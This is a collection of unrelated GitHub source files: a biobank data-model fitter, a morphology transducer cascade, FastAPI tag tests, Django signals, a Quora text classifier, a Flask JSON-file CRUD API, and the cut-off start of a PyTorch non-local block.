OrderedDict\n\nfrom unidecode import unidecode\n\nfrom molgenis.bbmri_eric.errors import EricWarning\nfrom molgenis.bbmri_eric.model import NodeData, Table, TableType\nfrom molgenis.bbmri_eric.printer import Printer\nfrom molgenis.bbmri_eric.utils import to_ordered_dict\n\n\nclass ModelFitter:\n \"\"\"\n Sometimes, model changes are implemented in the published tables, but can't be\n implemented yet in all staging areas because action (adjustment of local databases,\n API calls, etc) from the national nodes is needed.\n This class contains temporary solutions to transform the staging areas data\n according to the published model. If the models of all staging areas are equal to\n the published model this class shouldn't contain any methods.\n \"\"\"\n\n def __init__(\n self,\n node_data: NodeData,\n printer: Printer,\n ):\n self.node_data = node_data\n self.printer = printer\n\n self.warnings = []\n\n def fit_model(self):\n \"\"\"\n Transforms the data of a node according to the published model:\n 1. Merges biobank 'covid19biobank' values into 'capabilities'\n 2. Moves biobank and collection head information to persons\n \"\"\"\n self._merge_covid19_capabilities()\n self._move_heads_to_persons()\n return self.warnings\n\n def _add_warning(self, message: str):\n self.printer.print_warning(EricWarning(message), indent=1)\n self.warnings.append(message)\n\n def _merge_covid19_capabilities(self):\n \"\"\"\n Merges each biobank's 'covid19biobank' column into its 'capabilities' column and\n then removes it.\n \"\"\"\n self.printer.print(\"Merging 'covid19biobank' into 'capabilities'\")\n\n covid = \"covid19biobank\"\n caps = \"capabilities\"\n for biobank in self.node_data.biobanks.rows:\n if covid in biobank and biobank[covid]:\n self._add_warning(\n f\"Biobank {biobank['id']} uses deprecated {covid}' \"\n f\"column. Use '{caps}' instead.\"\n )\n\n if not biobank[caps]:\n biobank[caps] = []\n\n biobank[caps] = list(\n OrderedDict.fromkeys(biobank[caps] + biobank[covid])\n )\n\n biobank.pop(covid, None)\n\n def _move_heads_to_persons(self):\n \"\"\"\n Moves the head information in the biobank and collection tables to persons and\n adds the person ID to the biobank and collection tables.\n \"\"\"\n self.printer.print(\"Moving heads to persons\")\n self._move_heads_for_table(self.node_data.biobanks)\n self._move_heads_for_table(self.node_data.collections)\n\n def _move_heads_for_table(self, table: Table):\n \"\"\"\n 1. Checks if the head already exists as a person\n 2a. If not, creates a new person\n 2b. If so, updates person information (f.e. add the role)\n 3. Fills the 'head' column with person ID\n 4. Removes the redundant 'head' columns.\n \"\"\"\n head_columns = [\n \"head_title_before_name\",\n \"head_firstname\",\n \"head_lastname\",\n \"head_title_after_name\",\n \"head_role\",\n ]\n\n for row in table.rows:\n if set(row.keys()).isdisjoint(set(head_columns)):\n continue\n\n if \"head\" in row.keys():\n self._add_warning(\n f\"{table.type.value.capitalize()[:-1]} has a head ID. \"\n \"But still includes deprecated 'head' columns.\"\n )\n\n else:\n self._add_warning(\n f\"{table.type.value.capitalize()[:-1]} {row['id']} uses \"\n \"deprecated 'head' columns. Move head info to persons instead.\"\n )\n\n # Add head id to the table\n row[\"head\"] = self._add_head(row, table)\n\n for column in head_columns:\n row.pop(column, None)\n\n def _add_head(self, data, table):\n if {\"head_lastname\", \"head_firstname\"}.issubset(set(data.keys())):\n person_id = self._check_person(data)\n if not person_id:\n self._add_warning(\n f\"Add {data['head_firstname']} {data['head_lastname']} to persons \"\n )\n person_id = self._create_person(data)\n return person_id\n\n self._add_warning(\n f\"{table.type.value.capitalize()[:-1]} {data['id']} has head\"\n \" info without first and/or last name\"\n )\n\n return None\n\n def _check_person(self, data):\n # A head exists if the combination of first- and last name exists in persons\n for person in self.node_data.persons.rows:\n if (\n person.get(\"last_name\", \"NN\").lower().replace(\" \", \"\")\n == data[\"head_lastname\"].lower().replace(\" \", \"\")\n and person.get(\"first_name\", \"NN\").lower().strip()\n == data[\"head_firstname\"].lower().strip()\n ):\n if \"role\" in person and person[\"role\"] and data.get(\"head_role\"):\n roles = person[\"role\"].split(\" and \")\n roles.append(data.get(\"head_role\").strip())\n person[\"role\"] = \" and \".join(set(roles))\n else:\n person[\"role\"] = data.get(\"head_role\")\n return person[\"id\"]\n\n return None\n\n def _create_person(self, data):\n prefix = self.node_data.node.get_id_prefix(TableType.PERSONS)\n person = dict()\n person[\"id\"] = prefix + data.get(\"head_lastname\").lower().replace(\" \", \"\")\n person[\"id\"] = unidecode(person[\"id\"])\n person[\"title_before_name\"] = data.get(\"head_title_before_name\")\n person[\"first_name\"] = data.get(\"head_firstname\")\n person[\"last_name\"] = data.get(\"head_lastname\")\n person[\"title_after_name\"] = data.get(\"head_title_after_name\")\n person[\"role\"] = data.get(\"head_role\")\n person[\"email\"] = \"UNKNOWN@\" + self.node_data.node.code\n person[\"country\"] = data.get(\"country\")\n person[\"national_node\"] = self.node_data.node.code\n self.node_data.persons.rows_by_id.update(to_ordered_dict([person]))\n\n return person[\"id\"]\n","repo_name":"molgenis/molgenis-py-bbmri-eric","sub_path":"src/molgenis/bbmri_eric/model_fitting.py","file_name":"model_fitting.py","file_ext":"py","file_size_in_byte":6347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"905807783","text":"\"\"\"\nThis file is part of the L3Morpho package.\n\n L3Morpho is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n L3Morpho is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with L3Morpho. If not, see .\n-------------------------------------------------------\n\nCascades of weighted finite state transducers.\n\n-- 2011-05-20\n Split off from fst.py.\n\"\"\"\n\nimport re, os, time, functools\nfrom .semiring import *\nfrom .fst import FST\n\n######################################################################\n# CONTENTS\n######################################################################\n# 1. Finite State Transducer Cascade\n# 2. Alternation Rules\n# 3. Morphotactics\n######################################################################\n\n######################################################################\n# Constants\n######################################################################\n\nFST_DIRECTORY = os.path.join(os.path.dirname(__file__),\n os.path.pardir,\n 'FST')\n\n## Regexs for parsing cascades\n# string_set_label={chars1, chars1, chars2, ...}\nSS_RE = re.compile('(\\S+)\\s*=\\s*\\{(.*)\\}', re.U)\n# weighting = UNIFICATION\nWEIGHTING_RE = re.compile('weighting\\s*=\\s*(.*)')\n# >fst<\nCASC_FST_RE = re.compile(r'>(.*?)<')\n# cascade name = {0, 1, 3, ...}\nSUBCASC_RE = re.compile('cascade\\s*(\\S+)\\s*=\\s*\\{(.*)\\}')\n# +lex+\nCASC_LEX_RE = re.compile(r'\\+(.*?)\\+')\n\n\n######################################################################\n# Finite State Transducer Cascade\n######################################################################\n\nclass FSTCascade(list):\n \"\"\"\n A list of FSTs to be composed.\n \"\"\"\n\n def __init__(self, label, *fsts):\n list.__init__(self, fsts)\n\n self.label = label\n\n # String sets, abbreviated in cascade file\n self._stringsets = {}\n\n # Semiring weighting for all FSTs; defaults to FSS with unification\n self._weighting = UNIFICATION_SR\n\n # Composition of FSTs\n self._composition = None\n\n # All FSTs, including those not in the composition\n self._fsts = {}\n\n # Language this cascade belongs to\n self.language = None\n\n # Initial weight to use during transduction\n self.init_weight = None\n\n # Dictionary of lists of FST indices, for particular purposes\n self._cascades = {}\n\n def __str__(self):\n \"\"\"Print name for cascade.\"\"\"\n return 'FST cascade ' + self.label\n\n def add(self, fst):\n \"\"\"Add an FST to the dictionary with its label as key.\"\"\"\n self._fsts[fst.label] = fst\n\n def inverted(self):\n \"\"\"Return a list of inverted FSTs in the cascade.\"\"\"\n fsts = [(fst.inverted() if isinstance(fst, FST) else fst) for fst in self]\n inv = FSTCascade(self.label + '_inv', *fsts)\n inv.init_weight = self.init_weight\n inv._weighting = self._weighting\n inv._stringsets = self._stringsets\n return inv\n\n def compose(self, begin=0, end=None, first=None, last=None, subcasc=None, backwards=False,\n relabel=True, trace=0):\n \"\"\"Compose the FSTs that make up the cascade list or a sublist, including possible first and last FSTs.\"\"\"\n if len(self) == 1:\n return self[0]\n else:\n fsts = []\n if subcasc:\n if subcasc not in self._cascades:\n raise ValueError(\"%r is not a valid subscascade label\" % subcasc)\n fsts = [self[i] for i in self._cascades[subcasc]]\n else:\n fsts = self[begin:(end if end != None else len(self))] # end could be 0\n if first:\n fsts = [first] + fsts\n if last:\n fsts.append(last)\n return FST.compose(fsts, self.label + '@', relabel=relabel, trace=trace)\n\n def mult_compose(self, ends):\n begin = 0\n fsts = []\n for end in ends:\n fsts.append(self.compose(begin, end))\n begin = end\n fsts.append(self.compose(begin, len(self)))\n return fsts\n\n def rev_compose(self, split_index, begin=0, trace=0):\n \"\"\"Compose the FSTs in the cascade in two steps.\"\"\"\n # Compose from split_index to end\n c1 = self.compose(begin=split_index, trace=trace)\n # Compose from beginning to split_index\n return self.compose(begin=begin, end=split_index, last=c1, trace=trace)\n\n def compose_backwards(self, indices=[], subcasc=None, trace=0):\n if not indices:\n if subcasc:\n # Use a copy of the cascade indices because we're going to reverse them\n indices = list(self._cascades[subcasc])\n else:\n indices = range(len(self))\n indices.reverse()\n c = FST.compose([self[indices[1]], self[indices[0]]], trace=trace)\n for n in indices[2:]:\n c = FST.compose([self[n], c], trace=trace)\n return c\n\n def composition(self, begin=0, end=None):\n \"\"\"The composed FSTs.\"\"\"\n if not self._composition:\n self._composition = self.compose(begin=begin, end=end or len(self))\n return self._composition\n\n def transduce(self, inp_string, inp_weight, fsts, seg_units=[]):\n result = [[inp_string, inp_weight]]\n for fst in fsts:\n print(fst.label)\n result = reduce_lists([fst.transduce(x[0], x[1], seg_units=seg_units) for x in result])\n if not result:\n return False\n return result\n\n def stringset(self, label):\n \"\"\"A labeled set of strings.\"\"\"\n return self._stringsets.get(label, None)\n\n def stringset_label(self, stringset):\n \"\"\"The label for a stringset if it's in the dict.\"\"\"\n for label, sset in self._stringsets.items():\n if stringset == sset:\n return label\n\n def stringset_intersection(self, ss_label1=None, ss_label2=None, ss1=None, ss2=None):\n \"\"\"Label for the intersection of two stringsets or element if only one.\n\n Either the labels or the stringsets or both are provided.\"\"\"\n ss1 = ss1 or self.stringset(ss_label1)\n ss2 = ss2 or self.stringset(ss_label2)\n ss_label1 = ss_label1 or self.stringset_label(ss1)\n ss_label2 = ss_label2 or self.stringset_label(ss2)\n if ss1 and ss2:\n intersect = ss1 & ss2\n if intersect: # could be empty\n if len(intersect) == 1:\n # If there's only one element, don't create a new stringset\n return list(intersect)[0]\n # Otherwise create a new stringset\n i_label = self.stringset_label(intersect)\n if i_label:\n # The stringset intersection is already in the dict\n return i_label\n # The stringset intersection is not in the dict\n # Add it and return its label\n new_label = FSTCascade.simplify_intersection_label(ss_label1, ss_label2)\n return new_label\n\n @staticmethod\n def simplify_intersection_label(label1, label2):\n \"\"\"Simplify an intersection label by eliminating common elements.\"\"\"\n if not '&' in label1 and not '&' in label2:\n # the two expressions between with the same stringset\n return FSTCascade.simplify_difference_intersection_labels(label1, label2)\n else:\n return '&'.join(set(label1.split('&')) | set(label2.split('&')))\n\n @staticmethod\n def simplify_difference_intersection_labels(label1, label2):\n \"\"\"Simplify an intersection of differences if first elements are the same.\"\"\"\n labels1 = label1.split('-')\n labels2 = label2.split('-')\n if labels1[0] == labels2[0]:\n set1 = set(labels1[1].split(',')) if len(labels1) > 1 else set()\n set2 = set(labels2[1].split(',')) if len(labels2) > 1 else set()\n subtracted = set1 | set2\n return labels1[0] + '-' + ','.join(subtracted)\n else:\n return label1 + '&' + label2\n\n def generate_stringset(self, label):\n \"\"\"Make a stringset from a label.\n\n L: stored stringset\n L1-L2: difference of two stored stringsets\n L1-abc: difference of stringset L1 and the set of characters {abc}\n L1&L2: intersection of two stringsets (stored or generated)\n \"\"\"\n ss = self.stringset(label)\n if ss:\n return ss\n if '-' in label or '&' in label:\n return self.intersect_stringsets(label.split('&'))\n\n def subtract_stringsets(self, label1, label2):\n \"\"\"Difference between stringsets with labels or sets of characters.\"\"\"\n ss1 = self.stringset(label1)\n if not ss1:\n ss1 = set([label1])\n ss2 = self.stringset(label2)\n if not ss2:\n ss2 = set([label2]) # set consisting of single phoneme/grapheme\n return ss1 - ss2\n\n def intersect_stringsets(self, labels):\n \"\"\"Intersection of stringsets with given labels.\"\"\"\n return functools.reduce(lambda x, y: x.intersection(y), [self.diff_stringset(label) for label in labels])\n\n def diff_stringset(self, label):\n \"\"\"label is either a stored stringset or a stringset difference expression.\"\"\"\n ss = self.stringset(label)\n if ss:\n return ss\n labels = label.split(\"-\")\n # Assume there's only one -\n return self.subtract_strings(labels[0], labels[1])\n\n def subtract_strings(self, label1, label2):\n \"\"\"Difference between stringsets with labels or sets of characters.\"\"\"\n ss1 = self.stringset(label1)\n if not ss1:\n ss1 = set(label1.split(','))\n ss2 = self.stringset(label2)\n if not ss2:\n ss2 = set(label2.split(','))\n return ss1 - ss2\n\n def add_stringset(self, label, seq):\n \"\"\"Add a labeled set of strings, updating sigma accordingly.\"\"\"\n self._stringsets[label] = frozenset(seq)\n\n def weighting(self):\n \"\"\"The weighting semiring for the cascade.\"\"\"\n return self._weighting\n\n def set_weighting(self, label):\n \"\"\"Set the weighting for the cascade.\"\"\"\n label = label.lower()\n if 'uni' in label:\n self._weighting = UNIFICATION_SR\n elif 'prob' in label:\n self._weighting = PROBABILITY_SR\n elif 'trop' in label:\n self._weighting = TROPICAL_SR\n\n def get(self, label):\n \"\"\"The FST with the given label.\"\"\"\n return self._fsts.get(label)\n\n def set_init_weight(self, fs):\n self.init_weight = FSSet(fs)\n\n @staticmethod\n def load(filename, seg_units=[], create_networks=True, subcasc=None, language=None,\n weight_constraint=None, verbose=True):\n \"\"\"\n Load an FST cascade from a file.\n\n If not create_networks, only create the weighting and string sets.\n \"\"\"\n if verbose:\n print('Loading FST cascade from', filename)\n directory, fil = os.path.split(filename)\n label = del_suffix(fil, '.')\n\n return FSTCascade.parse(label, open(filename, encoding='utf-8').read(), directory=directory,\n subcasc=subcasc, create_networks=create_networks, seg_units=seg_units,\n language=language, weight_constraint=weight_constraint, verbose=verbose)\n \n @staticmethod\n def parse(label, s, directory='', create_networks=True, seg_units=[], subcasc=None, language=None,\n weight_constraint=None, verbose=False):\n \"\"\"\n Parse an FST cascade from the contents of a file as a string.\n\n If not create_networks, only create the weighting and string sets.\n \"\"\"\n\n cascade = FSTCascade(label)\n cascade.language = language\n cascade.seg_units = seg_units\n \n lines = s.split('\\n')[::-1]\n subcasc_indices = []\n\n while lines:\n line = lines.pop().split('#')[0].strip() # strip comments\n\n if not line: continue\n\n # Weighting for all FSTs\n m = WEIGHTING_RE.match(line)\n if m:\n cascade.set_weighting(m.group(1))\n continue\n\n # Subcascade, specifying indices\n # label = {i, j, ...}\n m = SUBCASC_RE.match(line)\n if m:\n label, indices = m.groups()\n indices = [int(i.strip()) for i in indices.split(',')]\n cascade._cascades[label] = indices\n # If we're only loading a certain subcascade and this is it, save its indices\n if label == subcasc:\n subcasc_indices = indices\n continue\n\n # String set (a list, converted to a frozenset)\n m = SS_RE.match(line)\n\n if m:\n label, strings = m.groups()\n # Characters may contain unicode\n# strings = strings.decode('utf8')\n cascade.add_stringset(label, [s.strip() for s in strings.split(',')])\n continue\n\n # FST\n m = CASC_FST_RE.match(line)\n if m:\n if create_networks:\n label = m.group(1)\n filename = label + '.fst'\n if not subcasc_indices or len(cascade) in subcasc_indices:\n fst = FST.load(os.path.join(directory, filename),\n cascade=cascade, weighting=cascade.weighting(),\n seg_units=seg_units, weight_constraint=weight_constraint,\n verbose=verbose)\n else:\n fst = 'FST' + str(len(cascade))\n if verbose:\n print('Skipping FST', label)\n cascade.append(fst)\n continue\n\n # FST in a lex file\n m = CASC_LEX_RE.match(line)\n if m:\n if create_networks:\n label = m.group(1)\n # handle specs\n filename = label + '.lex'\n if not subcasc_indices or len(cascade) in subcasc_indices:\n fst = FST.load(os.path.join(directory, filename),\n cascade=cascade, weighting=cascade.weighting(),\n seg_units=seg_units, weight_constraint=weight_constraint,\n verbose=verbose, lex_features=True)\n if verbose:\n print('Adding lex FST', label, 'to cascade')\n else:\n fst = 'FST' + str(len(cascade))\n if verbose:\n print('Skipping lex FST', label)\n cascade.append(fst)\n continue\n raise ValueError(\"bad line: %r\" % line)\n\n return cascade\n\n","repo_name":"adamsamson/HornMorpho2.5","sub_path":"HornMorpho-2.5/l3/morpho/casc.py","file_name":"casc.py","file_ext":"py","file_size_in_byte":15601,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"54"} +{"seq_id":"21420000581","text":"from uuid import UUID\n\nfrom fastapi.testclient import TestClient\n\nfrom app.main import app\nfrom app.tests.medium.constants import MISPTAG1, MISPTAG2, USER1\nfrom app.tests.medium.utils import create_misp_tag, create_user, headers\n\nclient = TestClient(app)\n\n\ndef test_create_misptag():\n create_user(USER1)\n misptag1 = create_misp_tag(USER1, MISPTAG1)\n assert misptag1.tag_name == MISPTAG1\n assert isinstance(misptag1.tag_id, UUID)\n\n\ndef test_get_misptags():\n create_user(USER1)\n create_misp_tag(USER1, MISPTAG1)\n create_misp_tag(USER1, MISPTAG2)\n response = client.get(\"/misp_tags\", headers=headers(USER1))\n assert response.status_code == 200\n responsed_misptags = response.json()\n assert len(responsed_misptags) == 2\n tag_names = [m[\"tag_name\"] for m in responsed_misptags]\n assert MISPTAG1 in tag_names\n assert MISPTAG2 in tag_names\n\n\ndef test_search_misptag():\n create_user(USER1)\n create_misp_tag(USER1, MISPTAG1)\n create_misp_tag(USER1, MISPTAG2)\n params = {\"words\": [\"amber\"]}\n response = client.get(\"/misp_tags/search\", headers=headers(USER1), params=params)\n assert response.status_code == 200\n assert len(response.json()) == 1\n","repo_name":"nttcom/threatconnectome","sub_path":"api/app/tests/medium/routers/test_misptags.py","file_name":"test_misptags.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"16213699388","text":"#Tuplas \n\ninventario = (\n\t\"espada\", \"armadura\", \"escudo\", \"pocion de vida\")\n\nif not inventario:\n\tprint(\"Tenes las manos vacias...\")\nelse:\n\tprint(\"Tus items: \")\n\n\tfor elemento in inventario:\n\t\tprint(\"*\",elemento.title())\n\ninput(\"Enter para continuar...\")","repo_name":"luzrubini/Pyhton","sub_path":"LuzRubini/clase_04/inventario_del_heroe.py","file_name":"inventario_del_heroe.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22712241671","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import get_object_or_404\nfrom .models import NotifyMe, Report, Post, Comments\n\n\n@receiver(post_save, sender=Report)\ndef create_report(sender, created, instance, **kwargs):\n title = \"New Report\"\n message = f\"{instance.user.username} add a new report\"\n\n admin_user = get_object_or_404(User, username=\"joselyn\")\n\n if created:\n NotifyMe.objects.create(user=admin_user, notify_title=title,\n notify_alert=message, sender=instance.user, greport=instance.id)\n\n\n@receiver(post_save, sender=Post)\ndef alert_post_create(sender, created, instance, **kwargs):\n title = \"New Post\"\n message = f\"{instance.author.username} added a new post\"\n\n users = User.objects.exclude(id=instance.author.id)\n\n if created:\n for i in users:\n NotifyMe.objects.create(user=i, notify_title=title, notify_alert=message,\n sender=instance.author, gpost=instance.id)\n\n\n@receiver(post_save, sender=Comments)\ndef alert_post_comment(sender, created, instance, **kwargs):\n title = \"New post comment\"\n post_user = instance.post.author\n message = f\"{instance.user.username} comment on your post '{instance.post.title}\"\n\n if created:\n if not instance.user == instance.post.author:\n NotifyMe.objects.create(user=post_user, notify_title=title, notify_alert=message,\n sender=instance.user, gpost=instance.post.id)\n","repo_name":"gabrielstonedelza/Orgeonofstars","sub_path":"blog/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2514441235","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\nimport os\nimport nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nimport pandas as pd\nfrom functools import reduce\nfrom tqdm import tqdm\n\n\ndef write_file(filename, headers, items):\n print(\"\\nWriting to file:\", filename)\n f = open(filename, \"w\", encoding='utf8')\n concat = lambda x,y: str(x) + ',' + str(y)\n f.write(reduce(concat, headers) + '\\n')\n for i in tqdm(range(len(items))):\n f.write(reduce(concat, items[i]) + '\\n')\n f.close()\n\n\ndef get_kwords(df, k=3):\n print('\\nProcessing k-words... k=' + str(k))\n progress = tqdm(total=df.shape[0])\n count = {} # (w0,w1,w2) -> (count_sincere, count_insencere)\n for index, row in df.iterrows():\n line = row[1].lower()\n target = row[2]\n for c in '.,:;?!/\"\\'()*&^%$#@':\n line = line.replace(c, ' ')\n \n line_words = word_tokenize(line)\n for i in range(len(line_words)-k+1):\n key = tuple(line_words[i+j] for j in range(k))\n if key not in count:\n count[key] = (0, 0)\n if target == 0:\n count[key] = (count[key][0] + 1, count[key][1])\n else:\n count[key] = (count[key][0], count[key][1] + 1)\n\n progress.update(1)\n\n # sort desc by insincere count\n sorted_count = sorted(count.items(), key=lambda item: item[1][1], reverse=True)\n total0 = float(sum([count[key][0] for key in count]))\n total1 = float(sum([count[key][1] for key in count]))\n result = []\n for item in sorted_count:\n r = list(item[0])\n r.extend(list(item[1]))\n r.append(item[1][0]/total0 if total0 > 0 else 0.)\n r.append(item[1][1]/total1 if total1 > 0 else 0.)\n result.append(tuple(r))\n return result\n\n\ndef get_target_kwords(df, k=3):\n count_all = get_kwords(df, k=3)\n headers = ['w0','w1','w2','count0','count1','rate0','rate1']\n\n print('\\nGetting target k-words...')\n result = {}\n print_list = []\n for item in tqdm(count_all):\n if item[-2]*10 < item[-1]:\n kword = tuple(item[j] for j in range(k))\n result[kword] = (item[-2], item[-1])\n\n return result\n\n\ndef predict(df_data, target_kwords, k=3, training=False):\n result = []\n predicted_correct = 0\n print('\\nPredicting target values...')\n progress = tqdm(total=df_data.shape[0])\n for index, row in df_data.iterrows():\n line = row[1].lower()\n target = row[2] if training else None\n for c in '.,:;?!/\"\\'()*&^%$#@':\n line = line.replace(c, ' ')\n\n line_words = word_tokenize(line)\n found_kwords = []\n for i in range(len(line_words)-k+1):\n kword = tuple(line_words[i+j] for j in range(k))\n if kword in target_kwords:\n found_kwords.append(kword)\n predicted = 1 if len(found_kwords) > 1 else 0\n \n if training:\n result.append((row[0], row[1], target, found_kwords, predicted))\n predicted_correct += 1 if predicted == target else 0\n else:\n result.append((row[0], predicted))\n progress.update(1)\n\n accuracy = predicted_correct/df_data.shape[0] if training else None\n return result, accuracy\n \n\ndir_path = os.path.abspath(\"../input\")\ndf_data = pd.read_csv(os.path.join(dir_path, 'train.csv'))\ntarget_kwords = get_target_kwords(df_data, k=3)\n\ndf_test = pd.read_csv(os.path.join(dir_path, 'test.csv'))\npredict_data, accuracy = predict(df_test, target_kwords, k=3, training=False)\nwrite_file('submission.csv', ['qid','prediction'], predict_data)\n\n\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/quora-insincere-questions-classification/GL/quora-3-gram-benchmark.py","file_name":"quora-3-gram-benchmark.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"32156976996","text":"from django.contrib import admin\n\nfrom keep_fm.tracks.models import Track, Artist\n\n\n@admin.register(Artist)\nclass ArtistAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"name\",\n )\n search_fields = (\"name\",)\n\n\n@admin.register(Track)\nclass TrackAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"name\",\n \"artist\",\n \"spotify_uri\",\n )\n readonly_fields = (\n \"spotify_data\",\n \"spotify_audio_features\",\n \"slug\",\n )\n list_select_related = (\"artist\",)\n autocomplete_fields = (\"artist\",)\n search_fields = (\n \"name\",\n \"artist__name\",\n )\n","repo_name":"rafaljusiak/keep-fm","sub_path":"keep_fm/tracks/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11441558561","text":"from dataclasses import dataclass\nfrom ntpath import join\nfrom posixpath import dirname\nimport uuid\nimport dotenv\nfrom os import path\nimport json\nfrom flask import Flask, request, jsonify\nfrom dotenv import load_dotenv\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n\napi = Flask(__name__)\n\n\n@api.route('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Welcome to the API', 'status': '200'})\n\n#READ ALL USERS - [GET] /users\n@api.route('/users', methods=['GET'])\ndef getUsers():\n\n if path.isfile('users.json'):\n with open('users.json') as f:\n users = json.load(f)\n if users:\n return jsonify({'users': users, 'status': '200'})\n else:\n return jsonify({'message': 'No users found', 'status': '404'})\n else:\n return jsonify({'message': 'User File not found', 'status': '404'})\n\n\n#READ USER - [GET] /user/\n@api.route('/user/', methods=['GET'])\ndef getUser(id):\n if path.isfile('users.json'):\n with open('users.json') as f:\n users = json.load(f)\n if users:\n for user in users:\n if user['id'] == id:\n return jsonify({'user': user, 'status': '200'})\n else:\n return jsonify({'message': 'User not found', 'status': '404'}) \n else:\n return jsonify({'message': 'No users found', 'status': '404'})\n else:\n return jsonify({'message': 'User File not found', 'status': '404'})\n\n\n# CREATE USER - [PUT] /user - {\"name\":\"dincer\",\"surname\":\"degre\",\"email\":\"dincerdegre@gmail.com\"}\n@api.route('/user', methods=['PUT'])\ndef createUser():\n if path.isfile('users.json'):\n userData = request.get_json()\n i = uuid.uuid4().hex\n with open('users.json') as f:\n usersData = json.load(f)\n if not usersData:\n userData['id'] = i\n data = [userData]\n with open('users.json', 'w') as f:\n json.dump(data, f)\n return jsonify({'message': 'User created', 'status': '200'})\n else: \n for user in usersData:\n if userData['email'] == user['email']:\n return jsonify({'message': 'User already exists', 'status': '400'})\n userData['id'] = i\n data = usersData + [userData]\n with open('users.json', 'w') as f:\n json.dump(data, f)\n return jsonify({'message': 'User created', 'status': '200'}) \n else:\n return jsonify({'message': 'User File not found', 'status': '404'})\n\n \n# CREATE OR UPDATE USER - [POST] /user - {\"name\":\"dincer\",\"surname\":\"degre\",\"email\":\"dincerdegre@gmail.com\"}\n@api.route('/user', methods=['POST'])\ndef createOrUpdateUser():\n if path.isfile('users.json'):\n userInputData = request.get_json()\n i = uuid.uuid4().hex\n data = []\n with open('users.json') as f:\n usersFileData = json.load(f)\n if not usersFileData:\n userInputData['id'] = i\n data.append(userInputData)\n with open('users.json', 'w') as f:\n json.dump(data, f)\n return jsonify({'message': 'User created', 'status': '200'})\n else: \n \n index = 0\n fIndex = None\n for userData in usersFileData:\n if userData['email'] == userInputData['email']:\n fIndex = index \n index = index + 1 \n \n if fIndex != None:\n userInputData['id'] = usersFileData[fIndex]['id']\n usersFileData[fIndex] = userInputData\n data = usersFileData\n userMessage = \"User updated\"\n else:\n data = usersFileData\n userInputData['id'] = i\n data.append(userInputData)\n userMessage = \"User created\"\n \n with open('users.json', 'w') as f:\n json.dump(data, f) \n return jsonify({'message': userMessage, 'status': '200','data':data}) \n else:\n return jsonify({'message': 'User File not found', 'status': '404'}) \n \n\n\n \n# DELETE - [DELETE] /user/ \n@api.route('/user/', methods=['DELETE']) \ndef deleteUser(id): \n if path.isfile('users.json'):\n data = []\n deletedUser = {}\n with open('users.json') as f:\n usersFileData = json.load(f)\n if usersFileData:\n for user in usersFileData:\n if user['id'] == id:\n deletedUser = user\n continue\n else:\n data.append(user)\n if (deletedUser): \n with open('users.json', 'w') as f:\n json.dump(data, f) \n return jsonify({'message': 'User deleted', 'status': '200','data':deletedUser}) \n else:\n return jsonify({'message': 'No users found', 'status': '404'}) \n else:\n return jsonify({'message': 'No users found', 'status': '404'})\n else:\n return jsonify({'message': 'User File not found', 'status': '404'})\n\napi.run(debug=True)\n\n\n","repo_name":"dincerdegre/python-rest-api-crud-example","sub_path":"flaskapi.py","file_name":"flaskapi.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39671058845","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as torch_init\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\nfrom model.modules import Fusion, MotionMemory, SA\n\n\ndef weight_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1 or classname.find('Linear') != -1:\n torch_init.xavier_uniform_(m.weight)\n if m.bias is not None:\n m.bias.data.fill_(0)\n\n\n# https://github.com/AlexHex7/Non-local_pytorch/blob/master/Non-Local_pytorch_0.4.1_to_1.1.0/lib/non_local_gaussian.py\nclass _NonLocalBlockND(nn.Module):\n def __init__(self, in_channels, inter_channels=None, dimension=3, sub_sample=True, bn_layer=True):\n super(_NonLocalBlockND, self).__init__()\n\n assert dimension in [1, 2, 3]\n\n self.dimension = dimension\n self.sub_sample = sub_sample\n\n self.in_channels = in_channels\n self.inter_channels = inter_channels\n\n if self.inter_channels is None:\n self.inter_channels = in_channels // 2\n if self.inter_channels == 0:\n self.inter_channels = 1\n\n if dimension == 3:\n conv_nd = nn.Conv3d\n max_pool_layer = nn.MaxPool3d(kernel_size=(1, 2, 2))\n bn = nn.BatchNorm3d\n elif dimension == 2:\n conv_nd = 